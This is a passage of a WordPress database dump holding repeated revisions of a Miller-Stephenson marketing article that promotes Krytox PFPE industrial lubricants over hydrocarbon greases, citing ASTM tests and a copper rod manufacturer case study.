Industrial Lubricant Stand t<img class="wp-image-3745 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/Krytox-Temperature-Comparison.jpg" alt="krytox-temperature-comparison" width="488" height="296" />he Heat?</strong>\r\n\r\nAs machine operating temperatures rise above 120 °C or fall below 0 °C, petroleum-based lubricants begin to fail, forcing costly re-lubrication and production interruption. Conventional synthetic lubricants (esters, polyalkylene glycols and polyalphaolefins) don’t perform much better. Krytox™ PFPE industrial lubricants are stable up to 350 °C and down to - 75 °C.\r\n\r\n<strong>Extreme Temperature Side by Side</strong>\r\n\r\nIn a side-by-side high temperature test, hydrocarbon and PFPE (Krytox™ GPL 227) grease were placed in an oven at 232 °C (450 °F) for 40 hours. The hydrocarbon grease lost 40 percent of its weight (ceasing to be an effective lubricant), and developed tar. Krytox™, the PFPE grease, remained unchanged in weight and appearance (lubricating ability fully intact).\r\n<h4><strong>Extreme Pressure (EP)</strong></h4>\r\n[caption id="attachment_3747" align="alignright" width="440"]<img class="wp-image-3747" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-vs-hydrocarbon.jpg" alt="krytox-vs-hydrocarbon" width="440" height="273" /> Krytox vs Standard Industrial Lubricants[/caption]\r\n\r\nPFPE greases with extreme pressure additives have high load-carrying capability and good lubrication characteristics under boundary and mixed friction conditions, making them ideal for use in high loading and slow speed conditions. In addition, PFPE oils provide inherent extreme pressure performance based on their unique chemistry.\r\n<h4><strong>Several tests have proven that PFPEs outperform and outlast hydrocarbon lubricants</strong></h4>\r\nIn a Pin and Vee Block Test (<a href="https://www.astm.org/Standards/D3233.htm">ASTM D-3233</a>) – an evaluation of wear, friction and extreme pressure – Krytox™ (PFPE) lubricants reached the maximum load in the test, while hydrocarbon lubricants displayed signs of extreme wear and often caused a catastrophic early failure.\r\n\r\nPFPE lubricants again outperformed hydrocarbon lubricants in a four ball extreme pressure test (<a href="https://www.astm.org/Standards/D2596.htm">ASTM D-2596</a>), which measures a lubricant’s performance under extreme pressure using a point contact sliding motion. Petroleum greases have a load wear index (LWI) of approximately 50, and synthetic hydrocarbons have LWIs close to 100. PFPEs were stable at LWIs more than twice the LWIs of hydrocarbon lubricants and matching or exceeding the LWIs of synthetic hydrocarbons.\r\n\r\nAnother test steadily increases the load on a rotating steel ball in contact with 3 fixed balls until they seize and welding occurs, which simulates point contact conditions. The lowest load (Weld Point) data is used to calculate the value of how well the grease prevents wear when operating below the weld point. For many competing greases, the LWI can generally fall between 50 and 100, but Krytox™ greases typically have an LWI well above 100, further illustrating how Krytox™ grease can outperform most competitive greases in both extreme pressure and extreme condition performance.\r\n\r\n[caption id="attachment_3746" align="alignleft" width="462"]<img class="wp-image-3746" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-astm-grease-life-test.jpg" alt="krytox-astm-grease-life-test" width="462" height="345" /> Krytox vs Other Industrial Lubricants[/caption]\r\n<h4><strong>The Test of Time</strong></h4>\r\nPFPEs outlasted hydrocarbons in the <a href="https://www.astm.org/Standards/D3336.htm">ASTM D-3336</a> test, which evaluates the endurance life of greases in ball bearings by rotating a bearing at a set speed and temperature. At 10,000 revolutions per minute (rpm) and about 177 °C (350°F), all tested hydrocarbon lubricants failed in less than 1,000 hours. <a href="https://www.miller-stephenson.com/product/krytox-aut-2e45/">Krytox™ AUT 2E45</a> grease performed for more than 25,000 hours – the equivalent of almost three years – without failing. The test was stopped before the lubricant failed.\r\n<h4><strong>Case Study: Copper Rod Manufacturer’s Experience</strong></h4>\r\nBefore using PFPEs, a copper rod manufacturer believed lubricating its rollers’ bearings (operating temperatures over 200 °C [400 °F]) every four hours with a synthetic hydrocarbon grease was the longest lasting solution available. By switching to a PFPE lubricant (Krytox™ XHT-BDX lubricant), they lowered re-lubrication to a monthly basis and cut annual bearing failures by nearly 98% (reducing replacements from 186 bearings each year to four). By switching to PFPEs, this copper rod manufacturer reduced maintenance costs, parts costs and production downtime.\r\n<h4><strong>The Choice is Clear with Krytox Industrial Lubricants</strong></h4>\r\nTraditionally, PFPEs have been only considered for applications running in extreme conditions. Today, more customers are realizing the benefits of PFPE lubrication in the more mundane applications where they had never been considered before. Krytox™ lubricants, a type of PFPE, provides exceptional value in use across a wide range of applications.\r\n\r\nHigh performing PFPE lubricants cost more per unit than hydrocarbon lubricants; however, the exceptional benefits of PFPE outweigh the costs: PFPEs cut maintenance costs, reduce part replacement costs and help reclaim lost opportunity.\r\n<h4><strong>Estimate Whether You Should Switch to PFPEs</strong></h4>\r\n<ol>\r\n 	<li><strong>Calculate Staff Opportunity Cost</strong>\r\nEstimate the time your company spends on maintaining lubricated parts. (What if the personnel were assigned elsewhere in the plant, if they did not have to do re-lubrication?)</li>\r\n 	<li><strong>Estimate All the Maintenance Costs</strong>\r\nAdd up all the costs of re-lubricating equipment, e.g., electric motors, including the cost of staff time, lubrication supplies and part replacement.</li>\r\n 	<li><strong>Add Up the Opportunity Costs</strong>\r\nEstimate the amount of downtime caused by re-lubrication and unscheduled lubrication due to equipment failures. Then, estimate the value of the product your company could have produced. Multiply the product sales volume by your product gross margin amount.</li>\r\n 	<li><strong>Contact a PFPE Manufacturer or Supplier</strong>\r\nFor example, Miller-Stephenson, which distributes Krytox™ lubricants, to calculate the savings available by switching to PFPE lubricants.</li>\r\n</ol>', 'Industrial Lubricants That Can Reduce Production Downtime', '', 'publish', 'closed', 'closed', '', 'comparing-industrial-lubricants', '', '', '2017-03-01 13:45:28', '2017-03-01 13:45:28', '', 0, 'https://www.miller-stephenson.com/?p=3744', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3745, 2, '2017-02-28 15:54:08', '2017-02-28 15:54:08', '', 'krytox-temperature-comparison', '', 'inherit', 'closed', 'closed', '', 'krytox-temperature-comparison', '', '', '2017-02-28 15:54:08', '2017-02-28 15:54:08', '', 3744, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/Krytox-Temperature-Comparison.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3746, 2, '2017-02-28 15:56:37', '2017-02-28 15:56:37', '', 'krytox-astm-grease-life-test', '', 'inherit', 'closed', 'closed', '', 'krytox-astm-grease-life-test', '', '', '2017-02-28 15:56:37', '2017-02-28 15:56:37', '', 3744, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-astm-grease-life-test.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3747, 2, '2017-02-28 16:00:40', '2017-02-28 16:00:40', '', 'krytox-vs-hydrocarbon', 'Krytox vs Industrial Lubricants', 'inherit', 'closed', 'closed', '', 'krytox-vs-hydrocarbon', '', '', '2017-02-28 16:11:57', '2017-02-28 16:11:57', '', 3744, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-vs-hydrocarbon.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3748, 2, '2017-02-28 16:13:49', '2017-02-28 16:13:49', '', 'industrial lubricants', 'Krytox', 'inherit', 'closed', 'closed', '', 'industrial-lubricants', '', '', '2017-02-28 16:14:07', '2017-02-28 16:14:07', '', 3744, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/Industrial-Lubricants.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3749, 2, '2017-02-28 16:14:48', '2017-02-28 16:14:48', '<h2>Comparing Industrial Lubricants - Alternatives &amp; Downsides of Hydrocarbons</h2>\r\n<h3>Petroleum-Based and Synthetic Hydrocarbon Lubricants vs. Krytox (PFPEs)</h3>\r\nWhile industrial lubricants only make up 1% of plant operational costs, the lack of proper lubrication or application can have an adverse impact on total maintenance costs and downtime. More than half of the total maintenance costs, as well as a cause of downtime, is directly related to one of the smallest budgeted items.\r\n\r\nThe ultimate industrial lubricant is one that lasts a long time and “just works.” That means it works just as well under normal temperature conditions, as well as in an extremely hot environment; or when faced with harsh chemicals, like boiling sulfuric acid.\r\n\r\nOne class of non-traditional synthetic industrial lubricants – perfluoropolyether (PFPE) lubricants – provides longerlasting performance, which results in reduced wear and tear for machine parts, lower maintenance costs and fewer production delays, even in the harshest environments.\r\n\r\nParts and equipment generally require more maintenance and capital reinvestment in environments where extreme temperatures and pressures are combined with harsh chemicals and conditions. Traditionally used petroleumbased hydrocarbon lubricants break down and fail at extreme temperatures with pressure and chemical exposures, requiring more frequent machine maintenance and causing shorter parts lifespans. Traditional synthetic industrial lubricants may provide only marginally better results.\r\n\r\nPFPE lubricants are proven to provide the broadest benefits, even in the most extreme conditions without breaking down. Using PFPE reduces equipment failure, maintenance cost, parts replacement and labor costs. More importantly, it reduces production downtime.\r\n\r\nThough more expensive than petroleum-based and other traditional synthetic industrial lubricants, PFPEs provide a short payback period and long-term benefits.\r\n<h4><strong>Stable Performance in Harsh Environments</strong></h4>\r\nOne of the greatest advantages of using PFPE lubricants is stability across a wide variety of operating conditions and environments. This inert nature is what allows PFPE greases and oils to outlast and outperform competing traditional synthetic and hydrocarbon products.\r\n\r\nIn addition to PFPE lubricants being chemically inert compared to virtually all chemicals commonly used in most industries, they are also water and oil repellent, solvent resistant, nonflammable, compatible with oxygen and reactive gases and non-toxic. And, they are compatible with most common elastomers, plastics and metals.\r\n\r\nEven with PFPEs having such extreme capabilities, they are completely safe to handle. When comparing the MSDS of Krytox™ lubricant, a type of PFPE lubricant, to the MSDS of sugar, sugar is more dangerous to handle.\r\n\r\nUsing PFPE lubricants can contribute significantly to lowering the cost of doing business – industries, such as aerospace, automotive and chemical, have used PFPEs with exceptional performance and reliability in the toughest conditions, where productivity matters and downtime is costly.\r\n<h4><strong>Extreme Compatibility</strong></h4>\r\nPFPE lubricants are stable and effective among other lubricants as well as steam, moisture and harsh chemicals. Because of their chemically inert properties, PFPE lubricants are safe to use with more than 100 different chemicals without degradation, including boiling sulfuric acid.\r\n\r\n<strong>Can Your Industrial Lubricant Stand t<img class="wp-image-3745 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/Krytox-Temperature-Comparison.jpg" alt="krytox-temperature-comparison" width="488" height="296" />he Heat?</strong>\r\n\r\nAs machine operating temperatures rise above 120 °C or fall below 0 °C, petroleum-based lubricants begin to fail, forcing costly re-lubrication and production interruption. Conventional synthetic lubricants (esters, polyalkylene glycols and polyalphaolefins) don’t perform much better. Krytox™ PFPE industrial lubricants are stable up to 350 °C and down to - 75 °C.\r\n\r\n&nbsp;\r\n<h4><strong>Extreme Temperature Side by Side</strong></h4>\r\nIn a side-by-side high temperature test, hydrocarbon and PFPE (Krytox™ GPL 227) grease were placed in an oven at 232 °C (450 °F) for 40 hours. The hydrocarbon grease lost 40 percent of its weight\r\n(ceasing to be an effective lubricant), and developed tar. Krytox™, the PFPE grease, remained unchanged in weight and appearance (lubricating ability fully intact).\r\n<h4><strong>Extreme Pressure (EP)</strong></h4>\r\n[caption id="attachment_3747" align="alignright" width="440"]<img class="wp-image-3747" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-vs-hydrocarbon.jpg" alt="krytox-vs-hydrocarbon" width="440" height="273" /> Krytox vs Standard Industrial Lubricants[/caption]\r\n\r\nPFPE greases with extreme pressure additives have high load-carrying capability and good lubrication characteristics under boundary and mixed friction conditions, making them ideal for use in high loading and slow speed conditions. In addition, PFPE oils provide inherent extreme pressure performance based on their unique chemistry.\r\n<h4><strong>Several tests have proven that PFPEs outperform and outlast hydrocarbon lubricants</strong></h4>\r\nIn a Pin and Vee Block Test (ASTM D-3233) – an evaluation of wear, friction and extreme pressure – Krytox™ (PFPE) lubricants reached the maximum load in the test, while hydrocarbon lubricants displayed signs of extreme wear and often caused a catastrophic early failure.\r\n\r\nPFPE lubricants again outperformed hydrocarbon lubricants in a four ball extreme pressure test (ASTM D-2596), which measures a lubricant’s performance under extreme pressure using a point contact sliding motion. Petroleum greases have a load wear index (LWI) of approximately 50, and synthetic hydrocarbons have LWIs close to 100. PFPEs were stable at LWIs more than twice the LWIs of hydrocarbon lubricants and matching or exceeding the LWIs of synthetic hydrocarbons.\r\n\r\nAnother test steadily increases the load on a rotating steel ball in contact with 3 fixed balls until they seize and welding occurs, which simulates point contact conditions. The lowest load (Weld Point) data is used to calculate the value of how well the grease prevents wear when operating below the weld point. For many competing greases, the LWI can generally fall between 50 and 100, but Krytox™ greases typically have an LWI well above 100, further illustrating how Krytox™ grease can outperform most competitive greases in both extreme pressure and extreme condition performance.\r\n\r\n[caption id="attachment_3746" align="alignleft" width="462"]<img class="wp-image-3746" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-astm-grease-life-test.jpg" alt="krytox-astm-grease-life-test" width="462" height="345" /> Krytox vs Other Industrial Lubricants[/caption]\r\n<h4><strong>The Test of Time</strong></h4>\r\nPFPEs outlasted hydrocarbons in the <a href="https://www.astm.org/Standards/D3336.htm">ASTM D-3336</a> test, which evaluates the endurance life of greases in ball bearings by rotating a bearing at a set speed and temperature. At 10,000 revolutions per minute (rpm) and about 177 °C (350°F), all tested hydrocarbon lubricants failed in less than 1,000 hours. <a href="https://www.miller-stephenson.com/product/krytox-aut-2e45/">Krytox™ AUT 2E45</a> grease performed for more than 25,000 hours – the equivalent of almost three years – without failing. The test was stopped before the lubricant failed.\r\n<h4><strong>Case Study: Copper Rod Manufacturer’s Experience</strong></h4>\r\nBefore using PFPEs, a copper rod manufacturer believed lubricating its rollers’ bearings (operating temperatures over 200 °C [400 °F]) every four hours with a synthetic hydrocarbon grease was the longest lasting solution available. By switching to a PFPE lubricant (Krytox™ XHT-BDX lubricant), they lowered re-lubrication to a monthly basis and cut annual bearing failures by nearly 98% (reducing replacements from 186 bearings each year to four). By switching to PFPEs, this copper rod manufacturer reduced maintenance costs, parts costs and production downtime.\r\n<h4><strong>The Choice is Clear with Krytox Industrial Lubricants</strong></h4>\r\nTraditionally, PFPEs have been only considered for applications running in extreme conditions. Today, more customers are realizing the benefits of PFPE lubrication in the more mundane applications where they had never been considered before. Krytox™ lubricants, a type of PFPE, provides exceptional value in use across a wide range of applications.\r\n\r\nHigh performing PFPE lubricants cost more per unit than hydrocarbon lubricants; however, the exceptional benefits of PFPE outweigh the costs: PFPEs cut maintenance costs, reduce part replacement costs and help reclaim lost opportunity.\r\n<h4><strong>Estimate Whether You Should Switch to PFPEs</strong></h4>\r\n<ol>\r\n 	<li><strong>Calculate Staff Opportunity Cost</strong>\r\nEstimate the time your company spends on maintaining lubricated parts. (What if the personnel were assigned elsewhere in the plant, if they did not have to do re-lubrication?)</li>\r\n 	<li><strong>Estimate All the Maintenance Costs</strong>\r\nAdd up all the costs of re-lubricating equipment, e.g., electric motors, including the cost of staff time, lubrication supplies and part replacement.</li>\r\n 	<li><strong>Add Up the Opportunity Costs</strong>\r\nEstimate the amount of downtime caused by re-lubrication and unscheduled lubrication due to equipment failures. Then, estimate the value of the product your company could have produced. Multiply the product sales volume by your product gross margin amount.</li>\r\n 	<li><strong>Contact a PFPE Manufacturer or Supplier</strong>\r\nFor example, Miller-Stephenson, which distributes Krytox™ lubricants, to calculate the savings available by switching to PFPE lubricants.</li>\r\n</ol>', 'Industrial Lubricants That Can Reduce Production Downtime', '', 'inherit', 'closed', 'closed', '', '3744-revision-v1', '', '', '2017-02-28 16:14:48', '2017-02-28 16:14:48', '', 3744, 'https://www.miller-stephenson.com/3744-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3750, 2, '2017-02-28 16:21:25', '2017-02-28 16:21:25', '<h2>Comparing Industrial Lubricants - Alternatives &amp; Downsides of Hydrocarbons</h2>\n<h3>Petroleum-Based and Synthetic Hydrocarbon Lubricants vs. Krytox (PFPEs)</h3>\nWhile industrial lubricants only make up 1% of plant operational costs, the lack of proper lubrication or application can have an adverse impact on total maintenance costs and downtime. More than half of the total maintenance costs, as well as a cause of downtime, is directly related to one of the smallest budgeted items.\n\nThe ultimate industrial lubricant is one that lasts a long time and “just works.” That means it works just as well under normal temperature conditions, as well as in an extremely hot environment; or when faced with harsh chemicals, like boiling sulfuric acid.\n\nOne class of non-traditional synthetic industrial lubricants – perfluoropolyether (PFPE) lubricants – provides longerlasting performance, which results in reduced wear and tear for machine parts, lower maintenance costs and fewer production delays, even in the harshest environments.\n\nParts and equipment generally require more maintenance and capital reinvestment in environments where extreme temperatures and pressures are combined with harsh chemicals and conditions. Traditionally used petroleumbased hydrocarbon lubricants break down and fail at extreme temperatures with pressure and chemical exposures, requiring more frequent machine maintenance and causing shorter parts lifespans. Traditional synthetic industrial lubricants may provide only marginally better results.\n\nPFPE lubricants are proven to provide the broadest benefits, even in the most extreme conditions without breaking down. Using PFPE reduces equipment failure, maintenance cost, parts replacement and labor costs. More importantly, it reduces production downtime.\n\nThough more expensive than petroleum-based and other traditional synthetic industrial lubricants, PFPEs provide a short payback period and long-term benefits.\n<h4><strong>Stable Performance in Harsh Environments</strong></h4>\nOne of the greatest advantages of using PFPE lubricants is stability across a wide variety of operating conditions and environments. This inert nature is what allows PFPE greases and oils to outlast and outperform competing traditional synthetic and hydrocarbon products.\n\nIn addition to PFPE lubricants being chemically inert compared to virtually all chemicals commonly used in most industries, they are also water and oil repellent, solvent resistant, nonflammable, compatible with oxygen and reactive gases and non-toxic. And, they are compatible with most common elastomers, plastics and metals.\n\nEven with PFPEs having such extreme capabilities, they are completely safe to handle. When comparing the MSDS of Krytox™ lubricant, a type of PFPE lubricant, to the MSDS of sugar, sugar is more dangerous to handle.\n\nUsing PFPE lubricants can contribute significantly to lowering the cost of doing business – industries, such as aerospace, automotive and chemical, have used PFPEs with exceptional performance and reliability in the toughest conditions, where productivity matters and downtime is costly.\n<h4><strong>Extreme Compatibility</strong></h4>\nPFPE lubricants are stable and effective among other lubricants as well as steam, moisture and harsh chemicals. Because of their chemically inert properties, PFPE lubricants are safe to use with more than 100 different chemicals without degradation, including boiling sulfuric acid.\n\n<strong>Can Your Industrial Lubricant Stand t<img class="wp-image-3745 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/Krytox-Temperature-Comparison.jpg" alt="krytox-temperature-comparison" width="488" height="296" />he Heat?</strong>\n\nAs machine operating temperatures rise above 120 °C or fall below 0 °C, petroleum-based lubricants begin to fail, forcing costly re-lubrication and production interruption. Conventional synthetic lubricants (esters, polyalkylene glycols and polyalphaolefins) don’t perform much better. Krytox™ PFPE industrial lubricants are stable up to 350 °C and down to - 75 °C.\n\n<strong>Extreme Temperature Side by Side</strong>\n\nIn a side-by-side high temperature test, hydrocarbon and PFPE (Krytox™ GPL 227) grease were placed in an oven at 232 °C (450 °F) for 40 hours. The hydrocarbon grease lost 40 percent of its weight (ceasing to be an effective lubricant), and developed tar. Krytox™, the PFPE grease, remained unchanged in weight and appearance (lubricating ability fully intact).\n<h4><strong>Extreme Pressure (EP)</strong></h4>\n[caption id="attachment_3747" align="alignright" width="440"]<img class="wp-image-3747" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-vs-hydrocarbon.jpg" alt="krytox-vs-hydrocarbon" width="440" height="273" /> Krytox vs Standard Industrial Lubricants[/caption]\n\nPFPE greases with extreme pressure additives have high load-carrying capability and good lubrication characteristics under boundary and mixed friction conditions, making them ideal for use in high loading and slow speed conditions. In addition, PFPE oils provide inherent extreme pressure performance based on their unique chemistry.\n<h4><strong>Several tests have proven that PFPEs outperform and outlast hydrocarbon lubricants</strong></h4>\nIn a Pin and Vee Block Test (<a href="https://www.astm.org/Standards/D3233.htm">ASTM D-3233</a>) – an evaluation of wear, friction and extreme pressure – Krytox™ (PFPE) lubricants reached the maximum load in the test, while hydrocarbon lubricants displayed signs of extreme wear and often caused a catastrophic early failure.\n\nPFPE lubricants again outperformed hydrocarbon lubricants in a four ball extreme pressure test (<a href="https://www.astm.org/Standards/D2596.htm">ASTM D-2596</a>), which measures a lubricant’s performance under extreme pressure using a point contact sliding motion. Petroleum greases have a load wear index (LWI) of approximately 50, and synthetic hydrocarbons have LWIs close to 100. PFPEs were stable at LWIs more than twice the LWIs of hydrocarbon lubricants and matching or exceeding the LWIs of synthetic hydrocarbons.\n\nAnother test steadily increases the load on a rotating steel ball in contact with 3 fixed balls until they seize and welding occurs, which simulates point contact conditions. The lowest load (Weld Point) data is used to calculate the value of how well the grease prevents wear when operating below the weld point. For many competing greases, the LWI can generally fall between 50 and 100, but Krytox™ greases typically have an LWI well above 100, further illustrating how Krytox™ grease can outperform most competitive greases in both extreme pressure and extreme condition performance.\n\n[caption id="attachment_3746" align="alignleft" width="462"]<img class="wp-image-3746" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-astm-grease-life-test.jpg" alt="krytox-astm-grease-life-test" width="462" height="345" /> Krytox vs Other Industrial Lubricants[/caption]\n<h4><strong>The Test of Time</strong></h4>\nPFPEs outlasted hydrocarbons in the <a href="https://www.astm.org/Standards/D3336.htm">ASTM D-3336</a> test, which evaluates the endurance life of greases in ball bearings by rotating a bearing at a set speed and temperature. At 10,000 revolutions per minute (rpm) and about 177 °C (350°F), all tested hydrocarbon lubricants failed in less than 1,000 hours. <a href="https://www.miller-stephenson.com/product/krytox-aut-2e45/">Krytox™ AUT 2E45</a> grease performed for more than 25,000 hours – the equivalent of almost three years – without failing. The test was stopped before the lubricant failed.\n<h4><strong>Case Study: Copper Rod Manufacturer’s Experience</strong></h4>\nBefore using PFPEs, a copper rod manufacturer believed lubricating its rollers’ bearings (operating temperatures over 200 °C [400 °F]) every four hours with a synthetic hydrocarbon grease was the longest lasting solution available. By switching to a PFPE lubricant (Krytox™ XHT-BDX lubricant), they lowered re-lubrication to a monthly basis and cut annual bearing failures by nearly 98% (reducing replacements from 186 bearings each year to four). By switching to PFPEs, this copper rod manufacturer reduced maintenance costs, parts costs and production downtime.\n<h4><strong>The Choice is Clear with Krytox Industrial Lubricants</strong></h4>\nTraditionally, PFPEs have been only considered for applications running in extreme conditions. Today, more customers are realizing the benefits of PFPE lubrication in the more mundane applications where they had never been considered before. Krytox™ lubricants, a type of PFPE, provides exceptional value in use across a wide range of applications.\n\nHigh performing PFPE lubricants cost more per unit than hydrocarbon lubricants; however, the exceptional benefits of PFPE outweigh the costs: PFPEs cut maintenance costs, reduce part replacement costs and help reclaim lost opportunity.\n<h4><strong>Estimate Whether You Should Switch to PFPEs</strong></h4>\n<ol>\n 	<li><strong>Calculate Staff Opportunity Cost</strong>\nEstimate the time your company spends on maintaining lubricated parts. (What if the personnel were assigned elsewhere in the plant, if they did not have to do re-lubrication?)</li>\n 	<li><strong>Estimate All the Maintenance Costs</strong>\nAdd up all the costs of re-lubricating equipment, e.g., electric motors, including the cost of staff time, lubrication supplies and part replacement.</li>\n 	<li><strong>Add Up the Opportunity Costs</strong>\nEstimate the amount of downtime caused by re-lubrication and unscheduled lubrication due to equipment failures. Then, estimate the value of the product your company could have produced. Multiply the product sales volume by your product gross margin amount.</li>\n 	<li><strong>Contact a PFPE Manufacturer or Supplier</strong>\nFor example, Miller-Stephenson, which distributes Krytox™ lubricants, to calculate the savings available by switching to PFPE lubricants.</li>\n</ol>', 'Industrial Lubricants That Can Reduce Production Downtime', '', 'inherit', 'closed', 'closed', '', '3744-autosave-v1', '', '', '2017-02-28 16:21:25', '2017-02-28 16:21:25', '', 3744, 'https://www.miller-stephenson.com/3744-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3751, 2, '2017-02-28 16:21:33', '2017-02-28 16:21:33', '<h2>Comparing Industrial Lubricants - Alternatives &amp; Downsides of Hydrocarbons</h2>\r\n<h3>Petroleum-Based and Synthetic Hydrocarbon Lubricants vs. Krytox (PFPEs)</h3>\r\nWhile industrial lubricants only make up 1% of plant operational costs, the lack of proper lubrication or application can have an adverse impact on total maintenance costs and downtime. More than half of the total maintenance costs, as well as a cause of downtime, is directly related to one of the smallest budgeted items.\r\n\r\nThe ultimate industrial lubricant is one that lasts a long time and “just works.” That means it works just as well under normal temperature conditions, as well as in an extremely hot environment; or when faced with harsh chemicals, like boiling sulfuric acid.\r\n\r\nOne class of non-traditional synthetic industrial lubricants – perfluoropolyether (PFPE) lubricants – provides longerlasting performance, which results in reduced wear and tear for machine parts, lower maintenance costs and fewer production delays, even in the harshest environments.\r\n\r\nParts and equipment generally require more maintenance and capital reinvestment in environments where extreme temperatures and pressures are combined with harsh chemicals and conditions. Traditionally used petroleumbased hydrocarbon lubricants break down and fail at extreme temperatures with pressure and chemical exposures, requiring more frequent machine maintenance and causing shorter parts lifespans. Traditional synthetic industrial lubricants may provide only marginally better results.\r\n\r\nPFPE lubricants are proven to provide the broadest benefits, even in the most extreme conditions without breaking down. Using PFPE reduces equipment failure, maintenance cost, parts replacement and labor costs. More importantly, it reduces production downtime.\r\n\r\nThough more expensive than petroleum-based and other traditional synthetic industrial lubricants, PFPEs provide a short payback period and long-term benefits.\r\n<h4><strong>Stable Performance in Harsh Environments</strong></h4>\r\nOne of the greatest advantages of using PFPE lubricants is stability across a wide variety of operating conditions and environments. This inert nature is what allows PFPE greases and oils to outlast and outperform competing traditional synthetic and hydrocarbon products.\r\n\r\nIn addition to PFPE lubricants being chemically inert compared to virtually all chemicals commonly used in most industries, they are also water and oil repellent, solvent resistant, nonflammable, compatible with oxygen and reactive gases and non-toxic. And, they are compatible with most common elastomers, plastics and metals.\r\n\r\nEven with PFPEs having such extreme capabilities, they are completely safe to handle. When comparing the MSDS of Krytox™ lubricant, a type of PFPE lubricant, to the MSDS of sugar, sugar is more dangerous to handle.\r\n\r\nUsing PFPE lubricants can contribute significantly to lowering the cost of doing business – industries, such as aerospace, automotive and chemical, have used PFPEs with exceptional performance and reliability in the toughest conditions, where productivity matters and downtime is costly.\r\n<h4><strong>Extreme Compatibility</strong></h4>\r\nPFPE lubricants are stable and effective among other lubricants as well as steam, moisture and harsh chemicals. Because of their chemically inert properties, PFPE lubricants are safe to use with more than 100 different chemicals without degradation, including boiling sulfuric acid.\r\n\r\n<strong>Can Your Industrial Lubricant Stand t<img class="wp-image-3745 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/Krytox-Temperature-Comparison.jpg" alt="krytox-temperature-comparison" width="488" height="296" />he Heat?</strong>\r\n\r\nAs machine operating temperatures rise above 120 °C or fall below 0 °C, petroleum-based lubricants begin to fail, forcing costly re-lubrication and production interruption. Conventional synthetic lubricants (esters, polyalkylene glycols and polyalphaolefins) don’t perform much better. Krytox™ PFPE industrial lubricants are stable up to 350 °C and down to - 75 °C.\r\n\r\n<strong>Extreme Temperature Side by Side</strong>\r\n\r\nIn a side-by-side high temperature test, hydrocarbon and PFPE (Krytox™ GPL 227) grease were placed in an oven at 232 °C (450 °F) for 40 hours. The hydrocarbon grease lost 40 percent of its weight (ceasing to be an effective lubricant), and developed tar. Krytox™, the PFPE grease, remained unchanged in weight and appearance (lubricating ability fully intact).\r\n<h4><strong>Extreme Pressure (EP)</strong></h4>\r\n[caption id="attachment_3747" align="alignright" width="440"]<img class="wp-image-3747" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-vs-hydrocarbon.jpg" alt="krytox-vs-hydrocarbon" width="440" height="273" /> Krytox vs Standard Industrial Lubricants[/caption]\r\n\r\nPFPE greases with extreme pressure additives have high load-carrying capability and good lubrication characteristics under boundary and mixed friction conditions, making them ideal for use in high loading and slow speed conditions. In addition, PFPE oils provide inherent extreme pressure performance based on their unique chemistry.\r\n<h4><strong>Several tests have proven that PFPEs outperform and outlast hydrocarbon lubricants</strong></h4>\r\nIn a Pin and Vee Block Test (<a href="https://www.astm.org/Standards/D3233.htm">ASTM D-3233</a>) – an evaluation of wear, friction and extreme pressure – Krytox™ (PFPE) lubricants reached the maximum load in the test, while hydrocarbon lubricants displayed signs of extreme wear and often caused a catastrophic early failure.\r\n\r\nPFPE lubricants again outperformed hydrocarbon lubricants in a four ball extreme pressure test (<a href="https://www.astm.org/Standards/D2596.htm">ASTM D-2596</a>), which measures a lubricant’s performance under extreme pressure using a point contact sliding motion. Petroleum greases have a load wear index (LWI) of approximately 50, and synthetic hydrocarbons have LWIs close to 100. PFPEs were stable at LWIs more than twice the LWIs of hydrocarbon lubricants and matching or exceeding the LWIs of synthetic hydrocarbons.\r\n\r\nAnother test steadily increases the load on a rotating steel ball in contact with 3 fixed balls until they seize and welding occurs, which simulates point contact conditions. The lowest load (Weld Point) data is used to calculate the value of how well the grease prevents wear when operating below the weld point. For many competing greases, the LWI can generally fall between 50 and 100, but Krytox™ greases typically have an LWI well above 100, further illustrating how Krytox™ grease can outperform most competitive greases in both extreme pressure and extreme condition performance.\r\n\r\n[caption id="attachment_3746" align="alignleft" width="462"]<img class="wp-image-3746" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-astm-grease-life-test.jpg" alt="krytox-astm-grease-life-test" width="462" height="345" /> Krytox vs Other Industrial Lubricants[/caption]\r\n<h4><strong>The Test of Time</strong></h4>\r\nPFPEs outlasted hydrocarbons in the <a href="https://www.astm.org/Standards/D3336.htm">ASTM D-3336</a> test, which evaluates the endurance life of greases in ball bearings by rotating a bearing at a set speed and temperature. At 10,000 revolutions per minute (rpm) and about 177 °C (350°F), all tested hydrocarbon lubricants failed in less than 1,000 hours. <a href="https://www.miller-stephenson.com/product/krytox-aut-2e45/">Krytox™ AUT 2E45</a> grease performed for more than 25,000 hours – the equivalent of almost three years – without failing. The test was stopped before the lubricant failed.\r\n<h4><strong>Case Study: Copper Rod Manufacturer’s Experience</strong></h4>\r\nBefore using PFPEs, a copper rod manufacturer believed lubricating its rollers’ bearings (operating temperatures over 200 °C [400 °F]) every four hours with a synthetic hydrocarbon grease was the longest lasting solution available. By switching to a PFPE lubricant (Krytox™ XHT-BDX lubricant), they lowered re-lubrication to a monthly basis and cut annual bearing 